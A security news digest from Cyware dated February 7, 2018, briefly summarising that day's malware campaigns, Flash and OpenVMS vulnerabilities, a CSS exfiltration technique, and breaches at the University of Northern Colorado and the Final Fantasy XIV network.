Cyware Daily Threat Intelligence February 07, 2018

Top Malware Reported in the Last 24 Hours
Gold Dragon implants
Hackers are launching phishing campaigns--that are downloading malicious implants--targeting organizations that are involved in the 2018 Winter Olympics. Named Gold Dragon, Brave Prince, Ghost419, and RunningRat, these implants surface once an initial PowerShell backdoor is installed.
Gold Dragon, a data-gathering implant, generates a key to encrypt data from the infected system and sends the data over to a remote server.

Fake Flash update drops CPU miners
A software touting as a Flash update is installing CPU miners in victim's computers. The miners are propagating using fake Facebook video pages that asked users to install a Flash player to continue. Thus, tricking users into downloading the miner.

Top Vulnerabilities Reported in the Last 24 Hours
Adobe released patches
Security patches have been released for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS to address critical vulnerabilities, CVE-2018-4878 and CVE-2018-4877. These flaws were found to allow remote code execution. Users are advised to update to Adobe Flash Player 28.0.0.161 to stay safe.

Exploitable bug affecting Alpha and Itanium systems
A privilege escalation flaw has been found in OpenVMS OS running on VAX and Alpha processors. The bug, dubbed CVE-2017-17482, could also affect Intel Itanium systems in mixed-architecture clusters. The vulnerability stems from a cockup in the command processing code within the VMS shell, called DCL.

CSS Exfil attack
Ever since CSS has become a mainstay for Web pages, hackers have started launching CSS Exfil attacks. Poor programming could result in creating vulnerabilities on the page. To stay safe, users are advised to implement the Content Security Policy, (CSP), which is an added security layer.

Top Breaches Reported in the Last 24 Hours
UNC data breach
University of Northern Colorado (UNC) recently suffered a data breach, resulting in leakage of personal information of 12 employees. Hackers stole social security numbers of these employees to reset their passwords and access their accounts. Victims' W2 forms were also stolen.

DDoS attacks on Final Fantasy XIV network
A network which hosts Final Fantasy XIV game was disrupted due to a distributed denial of service (DDoS) attack. This resulted in players experiencing difficulty in logging in to JP data center Worlds, and accessing, sending and receiving data from JP data centers.



Tags


    • Share this blog:
    To enhance your experience on our website, we use cookies to help us understand how you interact with our website. By continuing navigating through Cyware’s website and its products, you are accepting the placement and use of cookies. You can also choose to disable your web browser’s ability to accept cookies and how they are set. For more information, please see our Privacy Policy.